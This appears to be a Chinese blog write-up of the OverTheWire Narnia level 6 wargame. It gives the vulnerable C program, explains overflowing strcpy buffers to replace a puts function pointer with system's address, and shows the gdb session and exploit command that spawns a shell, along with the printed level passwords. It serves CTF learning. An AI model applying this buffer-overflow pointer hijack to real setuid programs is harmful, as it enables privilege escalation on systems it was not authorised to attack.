narnia6

narnia6

原創

2020-02-24 22:33

/** narnia6.c */

/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

// tired of fixing values...
// - morla
unsigned long get_sp(void) {
       __asm__("movl %esp,%eax\n\t"
               "and $0xff000000, %eax"
               );
}

int main(int argc, char *argv[])
{
	char b1[8], b2[8];
	int  (*fp)(char *)=(int(*)(char *))&puts, i;

	if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }

	/* clear environ */
	for(i=0; environ[i] != NULL; i++)
		memset(environ[i], '\0', strlen(environ[i]));
	/* clear argz    */
	for(i=3; argv[i] != NULL; i++)
		memset(argv[i], '\0', strlen(argv[i]));

	strcpy(b1,argv[1]);
	strcpy(b2,argv[2]);
	//if(((unsigned long)fp & 0xff000000) == 0xff000000)
	if(((unsigned long)fp & 0xff000000) == get_sp())
		exit(-1);
	fp(b1);

	exit(1);
}

fp本來初始化爲puts函數的

要用system的地址替換，首先得找到system函數的地址，可以通過gdb 的 p system命令獲取system函數的地址

再把b1設置成 /bin/sh

那最終調用fp(b1) 就變成了調用 system("/bin/sh");

root@today:~# ssh [email protected]

[email protected]'s password: neezocaeng

narnia6@melinda:~$ cd /narnia

narnia6@melinda:/narnia$ gdb -tui narnia6
(gdb) b main
(gdb) run `python -c 'print "AAAAAAAA\xff\xff\xff\xff"'` `python -c 'print "AAAAAAAA/bin/sh"'`
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e63cd0 <system>

narnia6@melinda:/narnia$ ./narnia6 `python -c 'print "AAAAAAAA\xd0\x3c\xe6\xf7"'` `python -c 'print "AAAAAAAA/bin/sh"'`
$ whoami
narnia7
$ cat /etc/narnia_pass/narnia7
ahkiaziphu
$

參考1: http://blog.csdn.net/linyt/article/details/43643499

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

使用c#強大的表達式樹實現對象的深克隆之解決循環引用的問題

痞子衡嵌入式：恩智浦i.MX RT1xxx系列MCU啓動那些事（12.A）- uSDHC eMMC啓動時間(RT1170)

GPT-4o 引領人機交互新風向，向量數據庫賽道沸騰了

企業大模型如何成爲自己數據的“百科全書”？

本地SSL證書過期輸入命令在IIS自動生成

基於Ubuntu-22.04安裝K8s-v1.28.2實驗（二）使用kube-vip實現集羣VIP訪問

.NET週刊【5月第2期 2024-05-12】

behemoth - 00

narnia7

線程池的實現（c語言）

narnia2

narnia1

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結